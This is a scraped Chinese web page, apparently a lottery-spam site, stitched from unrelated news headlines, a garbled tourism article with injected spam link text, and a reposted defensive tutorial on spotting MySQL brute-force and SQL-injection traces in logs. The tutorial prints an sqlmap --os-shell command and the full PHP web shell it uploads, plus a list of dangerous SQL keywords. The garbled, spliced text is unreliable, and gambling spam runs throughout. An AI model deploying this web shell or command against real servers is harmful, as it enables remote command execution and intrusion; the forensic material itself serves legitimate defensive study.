• 杭州加快钱塘江金融港湾建设 2019-08-21
  • 说道要害处,才会歇斯底里! 2019-08-21
  • 中国政法大学:“跨”出复合型人才培养路 2019-07-29
  • 广美毕业展展现城市文化活力 2019-07-25
  • 想不到北京二环还能买新房 ——凤凰网房产北京 2019-07-21
  • 重庆私藏的绝美古镇 悠闲不打挤 2019-07-03
  • 传统佳节遇上新潮玩法 嗨翻这个端午小长假 2019-06-18
  • 紫光阁中共中央国家机关工作委员会 2019-06-12
  • 也门:关注荷台达战事——多国联军夺取荷台达机场入口  2019-05-30
  • [微笑]所谓的卖地,表面上卖的是土地,实际上卖的是关联资源!这就是为什么同样面积的土地处于不同的城市不同的地段,价值可以有云泥之别的原因。 2019-05-26
  • 腾讯要花32亿收购《绝地求生》开发商10%股份 2019-05-26
  • 朔州:心系贫困山区 情暖留守儿童 2019-05-24
  • 世界3D打印技术产业 大会会址永久落户佛山 2019-05-24
  • 《古汉字发展论》简介 2019-05-22
  • 商务部新闻发言人就美方公布对华贸易措施发表谈话 2019-05-13
  • 河北11选五任5遗漏数据:慎入!女尸火葬前处理流程曝光

    中国奢侈品牌进军欧洲,不买LV买中国本土品牌的时代会不会来临?

    河北快3技巧 www.mms3n.com

        一切都在变。改革开放三十年,“中国制造”产业不断完善,中国品牌成熟度也不断增强。2019年,品牌价值评估和咨询机构Brand Finance最新公布的中国品牌300强排行榜显示,中国已经有能力在世界舞台上做品牌的领军者:中国品牌在包括银行、公用事业、保险、烈酒在内的多个领域都有着世界级领先品牌。

    yi qie dou zai bian. gai ge kai fang san shi nian," zhong guo zhi zao" chan ye bu duan wan shan, zhong guo pin pai cheng shu du ye bu duan zeng qiang. 2019 nian, pin pai jia zhi ping gu he zi xun ji gou Brand Finance zui xin gong bu de zhong guo pin pai 300 qiang pai hang bang xian shi, zhong guo yi jing you neng li zai shi jie wu tai shang zuo pin pai de ling jun zhe: zhong guo pin pai zai bao kuo yin hang gong yong shi ye bao xian lie jiu zai nei de duo ge ling yu dou you zhe shi jie ji ling xian pin pai.

    当前文章://www.mms3n.com/13i360/97420128.html

    发布时间:04:26:11


    {相关文章}

    祁县官方强调乔家大院被摘牌严重性:抹了黑丢了脸

        根据8月6日举行的乔家大院再创5A景区整改提升发布会上消息,意欲“用最短时间完成整改”的乔家大院,已有效整改了文1518算命网_环亚资讯网旅部检查组指出的6大类33条问题中的11条,完成率达33%?! ∩轿鞴悴サ缡犹ㄎ⑿殴拧盎坪油诽酢惫赜诜⒉蓟岬谋ǖ乐赋?,乔家大院所在的祁县将利用一个月的时间集中整改,利用一年的时间规范提升,在最短的时间内再创5A?! 〔檠⑾?,乔家大院被取消旅游景区质量等级问题的严重性,在当地多篇官方报道中屡有提及,仅8月4日祁县乔家大院景区再创5A景区整改提升工作动员会的报道就用百余字作深刻描述?! ”ǖ莱?,好看的qq分组符号_环亚资讯网祁县县委书记吴文胜指出,当前,中央、省市层面正在深入开展“不忘初心、牢记使命”主题教育,第二届全国青年运动会也即将在太原举办,这一时间正处于北方旅游旺季,全市城市提档升级攻坚行动、乡村振兴示范廊带建设正在如火如荼进行。给予乔家大院景区取消旅游景区质量等级处理不仅给给省市抹了黑、丢了脸,而且这一问题如果处理不好,对乔家景区发展和文旅小镇建设,对东观镇、开发区产业隆起带兴起,对招商引资都将产生严重影响,同时将会极大冲击祁县方兴未艾的文旅行业的集群化发展,影响全县全域旅游的发展,负面效应是广泛的、深层次的、深远的?! ∷怪赋?,要深刻剖析给予乔家大院景区取消旅游景区质量等级处理决定的种种原因。祁县各级在思想上、观念上、方法上、作风上存在很大短板。管理部门在团队建设、质量意识、制度规矩、执行落实等层面存在很大短板。从给予乔家大院景区取消旅游景区质量等级处理上看,全县各级干部和广大职工在对标一流、精益求精,深入贯彻落实“五大发展理念”、规矩意识、任务要求上存在巨大反差,这是深层次根本原因。另外,要坚决打赢全县A级景区保卫战。各级党员干部要冲锋在前、担当在前、以上率下,以再创国家5A级景区为目标契机,在全县上下来一场深刻的旅游市场革命,给全县干部群众来一次教育鞭策,在全社会各个层面来一次深刻的觉醒?! ∨炫刃挛抛⒁獾?,吴文胜在次日(8月5日)下午召开的晋中市A级景区保卫战动员会上作了深刻检查?! ”ǖ捞岬?,这场会议上,晋中市委副书记尹乃明首先传达的是省委书记骆惠宁、省长楼阳生和副省长张复明关于乔家大院景区被取消旅游景区质量等级的重要批示精神。晋中市委副书记、市长常书铭指出,全市A级景区保卫战是为全市、全省的荣誉而战,为了全国游客的基辅特锦赛中国区预选赛_环亚资讯网利益而战,是一场输不起、也绝对不能输的战役,各级各部门各景区必须全力以赴、打好打胜?! ≡缜暗?月31日,文化和旅游部发布消息,对乔家大院景区予以取消质量等级处理。并指出景区存在景区旅游产品类型单一,更新换代较慢;景区过度商业化问题严重,影响男子ps艳照敲诈_环亚资讯网景区品质提升;停车场面积不达标,没有生态停车场,部分停车场为泥土地面;景区内购物场所众多,有效管理不足;景区出入口景观效果差,景区内多处广告影响景区品质及景观效果等方面的问题?! ×硗?,新华网8月6日的报道称,晋中市和祁县相关部门按照文化和旅游部提出的6个方面、33项突出问题和自我查摆的4个方面、12项问题,成立了多严仁美100岁照片_环亚资讯网个专项工作组,对乔家大院景区的整改、问责、提质增效工作进行部署。目前祁县已经重新任命了乔家大院管理处的领导层,并已经全面取缔了核心景区“四堂一园”内的无序摊点,抑制景区的过度商业化,力争用最快的时间再创5A景区。

        

         责任编辑:贾芳

      &n95岁赌王何鸿燊入院_环亚资讯网bsp; 

        

        

        

        

        

         免责声明:以上内容为本网站转自其它媒体,相关信息仅为传递更多信息之目的,不代表本网观点,亦不代表本网站赞同其观点或证实其内容的真实性。如稿件版权单位或个人不想在本网发布,可与本网联系,本网视情况可立即将其撤除。

    2019-06-20 3,995

    常见的数据库攻击包括弱口令、SQL注入、提升权限、窃取备份等。对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景及追溯攻击源。

    0x01 Mysql日志分析

    general query log能记录成功连接和每次执行的查询,我们可以将它用作安全布防的一部分,为故障分析或黑客事件后的调查提供依据。

    1、查看log配置信息

    show variables like '%general%';

    2、开启日志

    SET GLOBAL general_log = 'On';

    3、指定日志文件路径

    SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';

    比如,当我访问 /test.php?id=1,此时我们得到这样的日志:

    190604 14:46:14       14 Connect    [email protected] on
                          14 Init DB    test   
                          14 Query    SELECT * FROM admin WHERE id = 1     
                          14 Quit

    我们按列来解析一下:

    第一列:Time,时间列,前面一个是日期,后面一个是小时和分钟,有一些不显示的原因是因为这些sql语句几乎是同时执行的,所以就不另外记录时间了。
    第二列:Id,就是show processlist出来的第一列的线程ID,对于长连接和一些比较耗时的sql语句,你可以精确找出究竟是那一条那一个线程在运行。
    第三列:Command,操作类型,比如Connect就是连接数据库,Query就是查询数据库(增删查改都显示为查询),可以特定过虑一些操作。
    第四列:Argument,详细信息,例如 Connect    [email protected] on 意思就是连接数据库,如此类推,接下面的连上数据库之后,做了什么查询的操作。

    0x02 登录成功/失败

    我们来做个简单的测试吧,使用我以前自己开发的弱口令工具来扫一下,字典设置比较小,2个用户,4个密码,共8组。

    MySQL中的log记录是这样子:

    Time                 Id        Command         Argument
    190601 22:03:20     98 Connect  [email protected] on
            98 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
            103 Connect  [email protected] on       
            103 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            104 Connect  [email protected] on       
            104 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Connect  [email protected] on       
            101 Connect  [email protected] on       
            101 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)       
            99 Connect  [email protected] on        
            99 Connect  Access denied for user 'root'@'192.168.204.1' (using password: YES)      
            105 Connect  [email protected] on       
            105 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Query  set autocommit=0      
            102 Connect  [email protected] on       
            102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)      
            100 Quit


    你知道在这个口令猜解过程中,哪个是成功的吗?

    利用爆破工具,一个口令猜解成功的记录是这样子的:

    190601 22:03:20     100 [email protected] on
       100 Queryset autocommit=0   
       100 Quit


    但是,如果你是用其他方式,可能会有一点点不一样的哦。

    Navicat for MySQL登录:

    190601 22:14:07  106 [email protected] on         
             106 QuerySET NAMES utf8
             106 QuerySHOW VARIABLES LIKE 'lower_case_%'         
             106 QuerySHOW VARIABLES LIKE 'profiling'         
             106 QuerySHOW DATABASES

    命令行登录:

    190601 22:17:25  111 [email protected] on
             111 Queryselect @@version_comment limit 1
             190601 22:17:56  111 Quit

    这个差别在于,不同的数据库连接工具,它在连接数据库初始化的过程中是不同的。通过这样的差别,我们可以简单判断出用户是通过连接数据库的方式。

    另外,不管你是爆破工具、Navicat for MySQL、还是命令行,登录失败都是一样的记录。

    登录失败的记录:

    102 Connect  [email protected] on 
    102 Connect  Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

    利用shell命令进行简单的分析:

    有哪些IP在爆破?

    grep  "Access denied" mysql.log |cut -d "'" -f4|uniq -c|sort -nr
         27 192.168.204.1

    爆破用户名字典都有哪些?

    grep  "Access denied" mysql.log |cut -d "'" -f2|uniq -c|sort -nr     13 mysql     12 root      1 root      1 mysql


    在日志分析中,特别需要注意一些敏感的操作行为,比如删表、备库,读写文件等。

    关键词:drop table、drop function、lock tables、unlock tables、load_file() 、into outfile、into dumpfile。
    敏感数据库表:SELECT * from mysql.user、SELECT * from mysql.func


    0x03 SQL注入入侵痕迹

    在利用SQL注入漏洞的过程中,我们会尝试利用sqlmap的--os-shell参数取得shell,如操作不慎,可能留下一些sqlmap创建的临时表和自定义函数。我们先来看一下sqlmap os-shell参数的用法以及原理:

    1、构造一个SQL注入点,开启Burp监听8080端口

    sqlmap.py  -u //192.168.204.164/sql.php?id=1 --os-shell --proxy=//127.0.0.1:8080

    HTTP通讯过程如下:

    创建了一个临时文件tmpbwyov.php,通过访问这个木马执行系统命令,并返回到页面展示。

    tmpbwyov.php:

    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);[email protected]_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>`

    创建了一个临时表sqlmapoutput,调用存储过程执行系统命令将数据写入临时表,然后取临时表中的数据展示到前端。

    通过查看网站目录中最近新建的可疑文件,可以判断是否发生过sql注入漏洞攻击事件。


    检查方法:

    1、检查网站目录下,是否存在一些木马文件:

    2、检查是否有UDF提权、MOF提权痕迹

    检查目录是否有异常文件

    mysqllibpluginc:/windows/system32/wbem/mof/

    检查函数是否删除

    select * from mysql.func

    3、结合web日志分析。


    本文转自公众号:Bypass

    Tags: 、、、、、、、、、、、、、、
    评论  (0)
    快来写下你的想法吧!

    Bypass007

    文章数:22 积分: 78

    一个网络安全爱好者,对技术有着偏执狂一样的追求。

    安全问答社区

    脉搏官方公众号

    活动日程

  • 杭州加快钱塘江金融港湾建设 2019-08-21
  • 说道要害处,才会歇斯底里! 2019-08-21
  • 中国政法大学:“跨”出复合型人才培养路 2019-07-29
  • 广美毕业展展现城市文化活力 2019-07-25
  • 想不到北京二环还能买新房 ——凤凰网房产北京 2019-07-21
  • 重庆私藏的绝美古镇 悠闲不打挤 2019-07-03
  • 传统佳节遇上新潮玩法 嗨翻这个端午小长假 2019-06-18
  • 紫光阁中共中央国家机关工作委员会 2019-06-12
  • 也门:关注荷台达战事——多国联军夺取荷台达机场入口  2019-05-30
  • [微笑]所谓的卖地,表面上卖的是土地,实际上卖的是关联资源!这就是为什么同样面积的土地处于不同的城市不同的地段,价值可以有云泥之别的原因。 2019-05-26
  • 腾讯要花32亿收购《绝地求生》开发商10%股份 2019-05-26
  • 朔州:心系贫困山区 情暖留守儿童 2019-05-24
  • 世界3D打印技术产业 大会会址永久落户佛山 2019-05-24
  • 《古汉字发展论》简介 2019-05-22
  • 商务部新闻发言人就美方公布对华贸易措施发表谈话 2019-05-13
  • 快乐扑克3窍门 香港赛马会致命一肖 江苏快3分析软件 彩票走势图制作软件 福利彩票深圳风采结果 四川快乐12近500期走势图 安徽十一选五开奖52期 模拟开乐彩 49彩票官网 重庆百变王牌彩票 世界杯德甲球队 公式规律高手区 竞彩篮球让分胜负什么意思 11选5前三自创杀号 江苏快三大小计划